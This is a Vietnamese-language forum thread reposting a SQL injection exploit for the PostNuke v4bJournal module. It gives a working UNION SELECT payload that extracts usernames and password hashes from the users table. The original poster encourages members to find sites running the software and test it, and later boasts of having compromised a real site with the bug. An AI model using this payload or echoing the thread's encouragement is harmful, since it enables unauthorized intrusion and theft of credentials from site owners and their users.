Latest posts for the topic "Post Nuke v4bJournal Module Sql Inject (02-05-07)"

Post Nuke v4bJournal Module Sql Inject (02-05-07)

SonNguyen_sn — GMT

Vừa check được chú này. Mọi người kiếm cái site nào sử dụng Source này. Test thử cái xem thế nào. PostNuke Journal ---------------------------------------- DISCOVERED BY :Ali Abbasi Olom Fonon Mazandaran University - Security Research Center, Babol, Iran Greetz For All Y! UnderGround Group Members ( www.2600.ir ) Greetz For All Persian Bugtraq Members ( www.bugtraq.ir ) Contact: abbasi (at) ustmb.ac (dot) ir [email concealed] {SQL BUG} in index.php?module=v4bJournal&func=journal_comment&id=(SQL)------------------------------------------ EXPLIOT BY :ABDUCTER Greetz For ABDUCTER Real Friend Nanos (Nancy) index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/selec t/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/n uke_users/**/where/**/pn_uid=2/*EX:- http://www.example.com/index.php?mod...urnal_comment& id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,1 1,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/* U must regrister first ( You Most Have An Account On Vulnerable Site )

Post Nuke v4bJournal Module Sql Inject (02-05-07)

minhquan1712 — GMT

Vừa check được chú này

cái này bên milw0rm có share rồi mà try it now ^_^ ax. cha này pót lên mà còn bỏ đi cái example của người ta nữa chứ =)) các bạn xem trang này thì sẽ rõ Code:

http://milw0rm.com/exploits/3835

Post Nuke v4bJournal Module Sql Inject (02-05-07)

SonNguyen_sn — GMT

minhquan1712 wrote:

Vừa check được chú này
cái này bên milw0rm có share rồi mà ax. cha này pót lên mà còn bỏ đi cái example của người ta nữa chứ =))

Nhầm hàng rồi! Ý tớ là Tớ vừa chiến đc 1 thằng dùng cái Post - Nuke nhờ cái bug này. Hớ hớ. Lần sau check lại bài tớ à nhá. Hỉu nhầm thế lày thì bán E-Gold mà ăn cám à ;)) :-o)